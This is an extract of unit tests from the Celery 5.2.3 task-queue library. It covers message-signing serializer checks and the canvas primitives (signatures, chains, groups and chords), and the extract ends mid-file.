from celery.security.serialization import SecureSerializer, register_auth

from . import CERT1, CERT2, KEY1, KEY2
from .case import SecurityCase


class test_secureserializer(SecurityCase):

    def _get_s(self, key, cert, certs):
        store = CertStore()
        for c in certs:
            store.add_cert(Certificate(c))
        return SecureSerializer(PrivateKey(key), Certificate(cert), store)

    def test_serialize(self):
        s = self._get_s(KEY1, CERT1, [CERT1])
        assert s.deserialize(s.serialize('foo')) == 'foo'

    def test_deserialize(self):
        s = self._get_s(KEY1, CERT1, [CERT1])
        with pytest.raises(SecurityError):
            s.deserialize('bad data')

    def test_unmatched_key_cert(self):
        s = self._get_s(KEY1, CERT2, [CERT1, CERT2])
        with pytest.raises(SecurityError):
            s.deserialize(s.serialize('foo'))

    def test_unknown_source(self):
        s1 = self._get_s(KEY1, CERT1, [CERT2])
        s2 = self._get_s(KEY1, CERT1, [])
        with pytest.raises(SecurityError):
            s1.deserialize(s1.serialize('foo'))
        with pytest.raises(SecurityError):
            s2.deserialize(s2.serialize('foo'))

    def test_self_send(self):
        s1 = self._get_s(KEY1, CERT1, [CERT1])
        s2 = self._get_s(KEY1, CERT1, [CERT1])
        assert s2.deserialize(s1.serialize('foo')) == 'foo'

    def test_separate_ends(self):
        s1 = self._get_s(KEY1, CERT1, [CERT2])
        s2 = self._get_s(KEY2, CERT2, [CERT1])
        assert s2.deserialize(s1.serialize('foo')) == 'foo'

    def test_register_auth(self):
        register_auth(KEY1, CERT1, '')
        assert 'application/data' in registry._decoders

    def test_lots_of_sign(self):
        for i in range(1000):
            rdata = bytes_to_str(base64.urlsafe_b64encode(os.urandom(265)))
            s = self._get_s(KEY1, CERT1, [CERT1])
            assert s.deserialize(s.serialize(rdata)) == rdata
celery-5.2.3/t/unit/tasks/
celery-5.2.3/t/unit/tasks/__init__.py
celery-5.2.3/t/unit/tasks/test_canvas.py
import json
from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel

import pytest
import pytest_subtests  # noqa: F401

from celery._state import _task_stack
from celery.canvas import (Signature, _chain, _maybe_group, chain, chord,
                           chunks, group, maybe_signature, maybe_unroll_group,
                           signature, xmap, xstarmap)
from celery.result import AsyncResult, EagerResult, GroupResult

SIG = Signature({
    'task': 'TASK',
    'args': ('A1',),
    'kwargs': {'K1': 'V1'},
    'options': {'task_id': 'TASK_ID'},
    'subtask_type': ''},
)


class test_maybe_unroll_group:

    def test_when_no_len_and_no_length_hint(self):
        g = MagicMock(name='group')
        g.tasks.__len__.side_effect = TypeError()
        g.tasks.__length_hint__ = Mock()
        g.tasks.__length_hint__.return_value = 0
assert maybe_unroll_group(g) is g g.tasks.__length_hint__.side_effect = AttributeError() assert maybe_unroll_group(g) is g class CanvasCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False) def mul(x, y): return x * y self.mul = mul @self.app.task(shared=False) def div(x, y): return x / y self.div = div class test_Signature(CanvasCase): def test_getitem_property_class(self): assert Signature.task assert Signature.args assert Signature.kwargs assert Signature.options assert Signature.subtask_type def test_getitem_property(self): assert SIG.task == 'TASK' assert SIG.args == ('A1',) assert SIG.kwargs == {'K1': 'V1'} assert SIG.options == {'task_id': 'TASK_ID'} assert SIG.subtask_type == '' def test_call(self): x = Signature('foo', (1, 2), {'arg1': 33}, app=self.app) x.type = Mock(name='type') x(3, 4, arg2=66) x.type.assert_called_with(3, 4, 1, 2, arg1=33, arg2=66) def test_link_on_scalar(self): x = Signature('TASK', link=Signature('B')) assert x.options['link'] x.link(Signature('C')) assert isinstance(x.options['link'], list) assert Signature('B') in x.options['link'] assert Signature('C') in x.options['link'] def test_json(self): x = Signature('TASK', link=Signature('B', app=self.app), app=self.app) assert x.__json__() == dict(x) @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): x = Signature('TASK', (2, 4), app=self.app) fun, args = x.__reduce__() assert fun(*args) == x def test_replace(self): x = Signature('TASK', ('A',), {}) assert x.replace(args=('B',)).args == ('B',) assert x.replace(kwargs={'FOO': 'BAR'}).kwargs == { 'FOO': 'BAR', } assert x.replace(options={'task_id': '123'}).options == { 'task_id': '123', } def test_set(self): assert Signature('TASK', x=1).set(task_id='2').options == { 'x': 1, 'task_id': '2', } def test_link(self): x = signature(SIG) x.link(SIG) x.link(SIG) assert SIG in x.options['link'] assert len(x.options['link']) == 1 def test_link_error(self): x = signature(SIG) x.link_error(SIG) x.link_error(SIG) assert SIG in x.options['link_error'] assert len(x.options['link_error']) == 1 def test_flatten_links(self): tasks = [self.add.s(2, 2), self.mul.s(4), self.div.s(2)] tasks[0].link(tasks[1]) tasks[1].link(tasks[2]) assert tasks[0].flatten_links() == tasks def test_OR(self): x = self.add.s(2, 2) | self.mul.s(4) assert isinstance(x, _chain) y = self.add.s(4, 4) | self.div.s(2) z = x | y assert isinstance(y, _chain) assert isinstance(z, _chain) assert len(z.tasks) == 4 with pytest.raises(TypeError): x | 10 ax = self.add.s(2, 2) | (self.add.s(4) | self.add.s(8)) assert isinstance(ax, _chain) assert len(ax.tasks), 3 == 'consolidates chain to chain' def test_INVERT(self): x = self.add.s(2, 2) x.apply_async = Mock() x.apply_async.return_value = Mock() x.apply_async.return_value.get = Mock() x.apply_async.return_value.get.return_value = 4 assert ~x == 4 x.apply_async.assert_called() def test_merge_immutable(self): x = self.add.si(2, 2, foo=1) args, kwargs, options = x._merge((4,), {'bar': 2}, {'task_id': 3}) assert args == (2, 2) assert kwargs == {'foo': 1} assert options == {'task_id': 3} def test_merge_options__none(self): sig = self.add.si() _, _, new_options = sig._merge() assert new_options is sig.options _, _, new_options = sig._merge(options=None) assert new_options is sig.options @pytest.mark.parametrize("immutable_sig", (True, False)) def test_merge_options__group_id(self, immutable_sig): # This is to avoid testing the behaviour in `test_set_immutable()` if immutable_sig: sig 
= self.add.si() else: sig = self.add.s() # If the signature has no group ID, it can be set assert not sig.options _, _, new_options = sig._merge(options={"group_id": sentinel.gid}) assert new_options == {"group_id": sentinel.gid} # But if one is already set, the new one is silently ignored sig.set(group_id=sentinel.old_gid) _, _, new_options = sig._merge(options={"group_id": sentinel.new_gid}) assert new_options == {"group_id": sentinel.old_gid} def test_set_immutable(self): x = self.add.s(2, 2) assert not x.immutable x.set(immutable=True) assert x.immutable x.set(immutable=False) assert not x.immutable def test_election(self): x = self.add.s(2, 2) x.freeze('foo') x.type.app.control = Mock() r = x.election() x.type.app.control.election.assert_called() assert r.id == 'foo' def test_AsyncResult_when_not_registered(self): s = signature('xxx.not.registered', app=self.app) assert s.AsyncResult def test_apply_async_when_not_registered(self): s = signature('xxx.not.registered', app=self.app) assert s._apply_async def test_keeping_link_error_on_chaining(self): x = self.add.s(2, 2) | self.mul.s(4) assert isinstance(x, _chain) x.link_error(SIG) assert SIG in x.options['link_error'] t = signature(SIG) z = x | t assert isinstance(z, _chain) assert t in z.tasks assert not z.options.get('link_error') assert SIG in z.tasks[0].options['link_error'] assert not z.tasks[2].options.get('link_error') assert SIG in x.options['link_error'] assert t not in x.tasks assert not x.tasks[0].options.get('link_error') z = t | x assert isinstance(z, _chain) assert t in z.tasks assert not z.options.get('link_error') assert SIG in z.tasks[1].options['link_error'] assert not z.tasks[0].options.get('link_error') assert SIG in x.options['link_error'] assert t not in x.tasks assert not x.tasks[0].options.get('link_error') y = self.add.s(4, 4) | self.div.s(2) assert isinstance(y, _chain) z = x | y assert isinstance(z, _chain) assert not z.options.get('link_error') assert SIG in z.tasks[0].options['link_error'] assert not z.tasks[2].options.get('link_error') assert SIG in x.options['link_error'] assert not x.tasks[0].options.get('link_error') z = y | x assert isinstance(z, _chain) assert not z.options.get('link_error') assert SIG in z.tasks[3].options['link_error'] assert not z.tasks[1].options.get('link_error') assert SIG in x.options['link_error'] assert not x.tasks[0].options.get('link_error') class test_xmap_xstarmap(CanvasCase): def test_apply(self): for type, attr in [(xmap, 'map'), (xstarmap, 'starmap')]: args = [(i, i) for i in range(10)] s = getattr(self.add, attr)(args) s.type = Mock() s.apply_async(foo=1) s.type.apply_async.assert_called_with( (), {'task': self.add.s(), 'it': args}, foo=1, route_name=self.add.name, ) assert type.from_dict(dict(s)) == s assert repr(s) class test_chunks(CanvasCase): def test_chunks(self): x = self.add.chunks(range(100), 10) assert dict(chunks.from_dict(dict(x), app=self.app)) == dict(x) assert x.group() assert len(x.group().tasks) == 10 x.group = Mock() gr = x.group.return_value = Mock() x.apply_async() gr.apply_async.assert_called_with((), {}, route_name=self.add.name) gr.apply_async.reset_mock() x() gr.apply_async.assert_called_with((), {}, route_name=self.add.name) self.app.conf.task_always_eager = True chunks.apply_chunks(app=self.app, **x['kwargs']) class test_chain(CanvasCase): def test_chain_of_chain_with_a_single_task(self): s = self.add.s(1, 1) assert chain([chain(s)]).tasks == list(chain(s).tasks) def test_clone_preserves_state(self): x = chain(self.add.s(i, i) for i in 
range(10)) assert x.clone().tasks == x.tasks assert x.clone().kwargs == x.kwargs assert x.clone().args == x.args def test_repr(self): x = self.add.s(2, 2) | self.add.s(2) assert repr(x) == f'{self.add.name}(2, 2) | add(2)' def test_apply_async(self): c = self.add.s(2, 2) | self.add.s(4) | self.add.s(8) result = c.apply_async() assert result.parent assert result.parent.parent assert result.parent.parent.parent is None def test_splices_chains(self): c = chain( self.add.s(5, 5), chain(self.add.s(6), self.add.s(7), self.add.s(8), app=self.app), app=self.app, ) c.freeze() tasks, _ = c._frozen assert len(tasks) == 4 def test_from_dict_no_tasks(self): assert chain.from_dict(dict(chain(app=self.app)), app=self.app) def test_from_dict_full_subtasks(self): c = chain(self.add.si(1, 2), self.add.si(3, 4), self.add.si(5, 6)) serialized = json.loads(json.dumps(c)) deserialized = chain.from_dict(serialized) assert all(isinstance(task, Signature) for task in deserialized.tasks) @pytest.mark.usefixtures('depends_on_current_app') def test_app_falls_back_to_default(self): from celery._state import current_app assert chain().app is current_app def test_handles_dicts(self): c = chain( self.add.s(5, 5), dict(self.add.s(8)), app=self.app, ) c.freeze() tasks, _ = c._frozen assert all(isinstance(task, Signature) for task in tasks) assert all(task.app is self.app for task in tasks) def test_groups_in_chain_to_chord(self): g1 = group([self.add.s(2, 2), self.add.s(4, 4)]) g2 = group([self.add.s(3, 3), self.add.s(5, 5)]) c = g1 | g2 assert isinstance(c, chord) def test_group_to_chord(self): c = ( self.add.s(5) | group([self.add.s(i, i) for i in range(5)], app=self.app) | self.add.s(10) | self.add.s(20) | self.add.s(30) ) c._use_link = True tasks, results = c.prepare_steps((), {}, c.tasks) assert tasks[-1].args[0] == 5 assert isinstance(tasks[-2], chord) assert len(tasks[-2].tasks) == 5 body = tasks[-2].body assert len(body.tasks) == 3 assert body.tasks[0].args[0] == 10 assert body.tasks[1].args[0] == 20 assert body.tasks[2].args[0] == 30 c2 = self.add.s(2, 2) | group(self.add.s(i, i) for i in range(10)) c2._use_link = True tasks2, _ = c2.prepare_steps((), {}, c2.tasks) assert isinstance(tasks2[0], group) def test_group_to_chord__protocol_2__or(self): c = ( group([self.add.s(i, i) for i in range(5)], app=self.app) | self.add.s(10) | self.add.s(20) | self.add.s(30) ) assert isinstance(c, chord) def test_group_to_chord__protocol_2(self): c = chain( group([self.add.s(i, i) for i in range(5)], app=self.app), self.add.s(10), self.add.s(20), self.add.s(30) ) assert isinstance(c, chord) assert isinstance(c.body, _chain) assert len(c.body.tasks) == 3 c2 = self.add.s(2, 2) | group(self.add.s(i, i) for i in range(10)) c2._use_link = False tasks2, _ = c2.prepare_steps((), {}, c2.tasks) assert isinstance(tasks2[0], group) def test_chord_to_chain(self): c = ( chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')], self.add.s(['foo'])) | chain(self.add.s(['y']), self.add.s(['z'])) ) assert isinstance(c, _chain) assert c.apply().get() == ['x0y0', 'x1y1', 'foo', 'y', 'z'] def test_chord_to_group(self): c = ( chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')], self.add.s(['foo'])) | group([self.add.s(['y']), self.add.s(['z'])]) ) assert isinstance(c, _chain) assert c.apply().get() == [ ['x0y0', 'x1y1', 'foo', 'y'], ['x0y0', 'x1y1', 'foo', 'z'] ] def test_apply_options(self): class static(Signature): def clone(self, *args, **kwargs): return self def s(*args, **kwargs): return static(self.add, args, kwargs, type=self.add, 
app=self.app) c = s(2, 2) | s(4) | s(8) r1 = c.apply_async(task_id='some_id') assert r1.id == 'some_id' c.apply_async(group_id='some_group_id') assert c.tasks[-1].options['group_id'] == 'some_group_id' c.apply_async(chord='some_chord_id') assert c.tasks[-1].options['chord'] == 'some_chord_id' c.apply_async(link=[s(32)]) assert c.tasks[-1].options['link'] == [s(32)] c.apply_async(link_error=[s('error')]) for task in c.tasks: assert task.options['link_error'] == [s('error')] def test_apply_options_none(self): class static(Signature): def clone(self, *args, **kwargs): return self def _apply_async(self, *args, **kwargs): self.args = args self.kwargs = kwargs c = static(self.add, (2, 2), type=self.add, app=self.app, priority=5) c.apply_async(priority=4) assert c.kwargs['priority'] == 4 c.apply_async(priority=None) assert c.kwargs['priority'] == 5 def test_reverse(self): x = self.add.s(2, 2) | self.add.s(2) assert isinstance(signature(x), _chain) assert isinstance(signature(dict(x)), _chain) def test_always_eager(self): self.app.conf.task_always_eager = True assert ~(self.add.s(4, 4) | self.add.s(8)) == 16 def test_chain_always_eager(self): self.app.conf.task_always_eager = True from celery import _state, result fixture_task_join_will_block = _state.task_join_will_block try: _state.task_join_will_block = _state.orig_task_join_will_block result.task_join_will_block = _state.orig_task_join_will_block @self.app.task(shared=False) def chain_add(): return (self.add.s(4, 4) | self.add.s(8)).apply_async() r = chain_add.apply_async(throw=True).get() assert r.get() == 16 finally: _state.task_join_will_block = fixture_task_join_will_block result.task_join_will_block = fixture_task_join_will_block def test_apply(self): x = chain(self.add.s(4, 4), self.add.s(8), self.add.s(10)) res = x.apply() assert isinstance(res, EagerResult) assert res.get() == 26 assert res.parent.get() == 16 assert res.parent.parent.get() == 8 assert res.parent.parent.parent is None def test_kwargs_apply(self): x = chain(self.add.s(), self.add.s(8), self.add.s(10)) res = x.apply(kwargs={'x': 1, 'y': 1}).get() assert res == 20 def test_single_expresion(self): x = chain(self.add.s(1, 2)).apply() assert x.get() == 3 assert x.parent is None def test_empty_chain_returns_none(self): assert chain(app=self.app)() is None assert chain(app=self.app).apply_async() is None def test_call_no_tasks(self): x = chain() assert not x() def test_call_with_tasks(self): x = self.add.s(2, 2) | self.add.s(4) x.apply_async = Mock() x(2, 2, foo=1) x.apply_async.assert_called_with((2, 2), {'foo': 1}) def test_from_dict_no_args__with_args(self): x = dict(self.add.s(2, 2) | self.add.s(4)) x['args'] = None assert isinstance(chain.from_dict(x), _chain) x['args'] = (2,) assert isinstance(chain.from_dict(x), _chain) def test_accepts_generator_argument(self): x = chain(self.add.s(i) for i in range(10)) assert x.tasks[0].type, self.add assert x.type def test_chord_sets_result_parent(self): g = (self.add.s(0, 0) | group(self.add.s(i, i) for i in range(1, 10)) | self.add.s(2, 2) | self.add.s(4, 4)) res = g.freeze() assert isinstance(res, AsyncResult) assert not isinstance(res, GroupResult) assert isinstance(res.parent, AsyncResult) assert not isinstance(res.parent, GroupResult) assert isinstance(res.parent.parent, GroupResult) assert isinstance(res.parent.parent.parent, AsyncResult) assert not isinstance(res.parent.parent.parent, GroupResult) assert res.parent.parent.parent.parent is None seen = set() node = res while node: assert node.id not in seen seen.add(node.id) 
node = node.parent def test_append_to_empty_chain(self): x = chain() x |= self.add.s(1, 1) x |= self.add.s(1) x.freeze() tasks, _ = x._frozen assert len(tasks) == 2 assert x.apply().get() == 3 @pytest.mark.usefixtures('depends_on_current_app') def test_chain_single_child_result(self): child_sig = self.add.si(1, 1) chain_sig = chain(child_sig) assert chain_sig.tasks[0] is child_sig with patch.object( # We want to get back the result of actually applying the task child_sig, "apply_async", ) as mock_apply, patch.object( # The child signature may be clone by `chain.prepare_steps()` child_sig, "clone", return_value=child_sig, ): res = chain_sig() # `_prepare_chain_from_options()` sets this `chain` kwarg with the # subsequent tasks which would be run - nothing in this case mock_apply.assert_called_once_with(chain=[]) assert res is mock_apply.return_value @pytest.mark.usefixtures('depends_on_current_app') def test_chain_single_child_group_result(self): child_sig = self.add.si(1, 1) # The group will `clone()` the child during instantiation so mock it with patch.object(child_sig, "clone", return_value=child_sig): group_sig = group(child_sig) # Now we can construct the chain signature which is actually under test chain_sig = chain(group_sig) assert chain_sig.tasks[0].tasks[0] is child_sig with patch.object( # We want to get back the result of actually applying the task child_sig, "apply_async", ) as mock_apply, patch.object( # The child signature may be clone by `chain.prepare_steps()` child_sig, "clone", return_value=child_sig, ): res = chain_sig() # `_prepare_chain_from_options()` sets this `chain` kwarg with the # subsequent tasks which would be run - nothing in this case mock_apply.assert_called_once_with(chain=[]) assert res is mock_apply.return_value class test_group(CanvasCase): def test_repr(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) assert repr(x) def test_reverse(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) assert isinstance(signature(x), group) assert isinstance(signature(dict(x)), group) def test_cannot_link_on_group(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) with pytest.raises(TypeError): x.apply_async(link=self.add.s(2, 2)) def test_cannot_link_error_on_group(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) with pytest.raises(TypeError): x.apply_async(link_error=self.add.s(2, 2)) def test_group_with_group_argument(self): g1 = group(self.add.s(2, 2), self.add.s(4, 4), app=self.app) g2 = group(g1, app=self.app) assert g2.tasks is g1.tasks def test_maybe_group_sig(self): assert _maybe_group(self.add.s(2, 2), self.app) == [self.add.s(2, 2)] def test_apply(self): x = group([self.add.s(4, 4), self.add.s(8, 8)]) res = x.apply() assert res.get(), [8 == 16] def test_apply_async(self): x = group([self.add.s(4, 4), self.add.s(8, 8)]) x.apply_async() def test_prepare_with_dict(self): x = group([self.add.s(4, 4), dict(self.add.s(8, 8))], app=self.app) x.apply_async() def test_group_in_group(self): g1 = group(self.add.s(2, 2), self.add.s(4, 4), app=self.app) g2 = group(self.add.s(8, 8), g1, self.add.s(16, 16), app=self.app) g2.apply_async() def test_set_immutable(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) g1.set_immutable(True) for task in g1.tasks: task.set_immutable.assert_called_with(True) def test_link(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) sig = Mock(name='sig') g1.link(sig) # Only the first child signature of a group will be given the callback # and it is cloned and made immutable to avoid passing results 
to it, # since that first task can't pass along its siblings' return values g1.tasks[0].link.assert_called_with(sig.clone().set(immutable=True)) def test_link_error(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) sig = Mock(name='sig') g1.link_error(sig) # We expect that all group children will be given the errback to ensure # it gets called for child_sig in g1.tasks: child_sig.link_error.assert_called_with(sig) def test_apply_empty(self): x = group(app=self.app) x.apply() res = x.apply_async() assert res assert not res.results def test_apply_async_with_parent(self): _task_stack.push(self.add) try: self.add.push_request(called_directly=False) try: assert not self.add.request.children x = group([self.add.s(4, 4), self.add.s(8, 8)]) res = x() assert self.add.request.children assert res in self.add.request.children assert len(self.add.request.children) == 1 finally: self.add.pop_request() finally: _task_stack.pop() def test_from_dict(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) x['args'] = (2, 2) assert group.from_dict(dict(x)) x['args'] = None assert group.from_dict(dict(x)) def test_from_dict_deep_deserialize(self): original_group = group([self.add.s(1, 2)] * 42) serialized_group = json.loads(json.dumps(original_group)) deserialized_group = group.from_dict(serialized_group) assert all( isinstance(child_task, Signature) for child_task in deserialized_group.tasks ) def test_from_dict_deeper_deserialize(self): inner_group = group([self.add.s(1, 2)] * 42) outer_group = group([inner_group] * 42) serialized_group = json.loads(json.dumps(outer_group)) deserialized_group = group.from_dict(serialized_group) assert all( isinstance(child_task, Signature) for child_task in deserialized_group.tasks ) assert all( isinstance(grandchild_task, Signature) for child_task in deserialized_group.tasks for grandchild_task in child_task.tasks ) def test_call_empty_group(self): x = group(app=self.app) assert not len(x()) x.delay() x.apply_async() x() def test_skew(self): g = group([self.add.s(i, i) for i in range(10)]) g.skew(start=1, stop=10, step=1) for i, task in enumerate(g.tasks): assert task.options['countdown'] == i + 1 def test_iter(self): g = group([self.add.s(i, i) for i in range(10)]) assert list(iter(g)) == list(g.keys()) def test_single_task(self): g = group([self.add.s(1, 1)]) assert isinstance(g, group) assert len(g.tasks) == 1 g = group(self.add.s(1, 1)) assert isinstance(g, group) assert len(g.tasks) == 1 @staticmethod def helper_test_get_delay(result): import time t0 = time.time() while not result.ready(): time.sleep(0.01) if time.time() - t0 > 1: return None return result.get() def test_kwargs_direct(self): res = [self.add(x=1, y=1), self.add(x=1, y=1)] assert res == [2, 2] def test_kwargs_apply(self): x = group([self.add.s(), self.add.s()]) res = x.apply(kwargs={'x': 1, 'y': 1}).get() assert res == [2, 2] def test_kwargs_apply_async(self): self.app.conf.task_always_eager = True x = group([self.add.s(), self.add.s()]) res = self.helper_test_get_delay( x.apply_async(kwargs={'x': 1, 'y': 1}) ) assert res == [2, 2] def test_kwargs_delay(self): self.app.conf.task_always_eager = True x = group([self.add.s(), self.add.s()]) res = self.helper_test_get_delay(x.delay(x=1, y=1)) assert res == [2, 2] def test_kwargs_delay_partial(self): self.app.conf.task_always_eager = True x = group([self.add.s(1), self.add.s(x=1)]) res = self.helper_test_get_delay(x.delay(y=1)) assert res == [2, 2] def test_apply_from_generator(self): child_count = 42 child_sig = self.add.si(0, 0) 
child_sigs_gen = (child_sig for _ in range(child_count)) group_sig = group(child_sigs_gen) with patch("celery.canvas.Signature.apply_async") as mock_apply_async: res_obj = group_sig.apply_async() assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # This needs the current app for some reason not worth digging into @pytest.mark.usefixtures('depends_on_current_app') def test_apply_from_generator_empty(self): empty_gen = (False for _ in range(0)) group_sig = group(empty_gen) with patch("celery.canvas.Signature.apply_async") as mock_apply_async: res_obj = group_sig.apply_async() assert mock_apply_async.call_count == 0 assert len(res_obj.children) == 0 # In the following tests, getting the group ID is a pain so we just use # `ANY` to wildcard it when we're checking on calls made to our mocks def test_apply_contains_chord(self): gchild_count = 42 gchild_sig = self.add.si(0, 0) gchild_sigs = (gchild_sig, ) * gchild_count child_chord = chord(gchild_sigs, gchild_sig) group_sig = group((child_chord, )) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == gchild_count assert len(res_obj.children) == len(group_sig.tasks) # We must have set the chord size for the group of tasks which makes up # the header of the `child_chord`, just before we apply the last task. mock_set_chord_size.assert_called_once_with(ANY, gchild_count) def test_apply_contains_chords_containing_chain(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = chain((ggchild_sig, ) * ggchild_count) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated chains - in this case 1 for each child chord mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count) @pytest.mark.xfail(reason="Invalid canvas setup with bad exception") def test_apply_contains_chords_containing_empty_chain(self): gchild_sig = chain(tuple()) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) # This is an invalid setup because we can't complete a chord header if # there are no actual tasks which will run in it. However, the current # behaviour of an `IndexError` isn't particularly helpful to a user. 
group_sig.apply_async() def test_apply_contains_chords_containing_chain_with_empty_tail(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) tail_count = 24 gchild_sig = chain( (ggchild_sig, ) * ggchild_count + (group((ggchild_sig, ) * tail_count), group(tuple()), ), ) child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, )) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == 1 assert len(res_obj.children) == 1 # We must have set the chord sizes based on the size of the last # non-empty task in the encapsulated chains - in this case `tail_count` # for the group preceding the empty one in each grandchild chain mock_set_chord_size.assert_called_once_with(ANY, tail_count) def test_apply_contains_chords_containing_group(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = group((ggchild_sig, ) * ggchild_count) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We see applies for all of the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count * ggchild_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated groups - in this case `ggchild_count` mock_set_chord_size.assert_has_calls( (call(ANY, ggchild_count), ) * child_count, ) @pytest.mark.xfail(reason="Invalid canvas setup but poor behaviour") def test_apply_contains_chords_containing_empty_group(self): gchild_sig = group(tuple()) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # This is actually kind of meaningless because, similar to the empty # chain test, this is an invalid setup. However, we should probably # expect that the chords are dealt with in some other way the probably # being left incomplete forever... 
mock_set_chord_size.assert_has_calls((call(ANY, 0), ) * child_count) def test_apply_contains_chords_containing_chord(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = chord((ggchild_sig, ) * ggchild_count, ggchild_sig) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We see applies for all of the header great-grandchildren because the # tasks are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count * ggchild_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the deeply encapsulated chords' header tasks, as well as for each # child chord. This means we have `child_count` interleaved calls to # set chord sizes of 1 and `ggchild_count`. mock_set_chord_size.assert_has_calls( (call(ANY, 1), call(ANY, ggchild_count), ) * child_count, ) def test_apply_contains_chords_containing_empty_chord(self): gchild_sig = chord(tuple(), self.add.si(0, 0)) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated chains - in this case 1 for each child chord mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count) class test_chord(CanvasCase): def test__get_app_does_not_exhaust_generator(self): def build_generator(): yield self.add.s(1, 1) self.second_item_returned = True yield self.add.s(2, 2) raise pytest.fail("This should never be reached") self.second_item_returned = False c = chord(build_generator(), self.add.s(3)) c.app # The second task gets returned due to lookahead in `regen()` assert self.second_item_returned # Access it again to make sure the generator is not further evaluated c.app def test_reverse(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) assert isinstance(signature(x), chord) assert isinstance(signature(dict(x)), chord) def test_clone_clones_body(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) y = x.clone() assert x.kwargs['body'] is not y.kwargs['body'] y.kwargs.pop('body') z = y.clone() assert z.kwargs.get('body') is None def test_argument_is_group(self): x = chord(group(self.add.s(2, 2), self.add.s(4, 4), app=self.app)) assert x.tasks def test_app_when_app(self): app = Mock(name='app') x = chord([self.add.s(4, 4)], app=app) assert x.app is app def test_app_when_app_in_task(self): t1 = Mock(name='t1') t2 = Mock(name='t2') x = chord([t1, self.add.s(4, 4)]) assert x.app is x.tasks[0].app t1.app = None x = chord([t1], body=t2) assert x.app is t2._app def test_app_when_header_is_empty(self): x = chord([], self.add.s(4, 4)) assert x.app is self.add.app @pytest.mark.usefixtures('depends_on_current_app') def test_app_fallback_to_current(self): from celery._state import current_app t1 = 
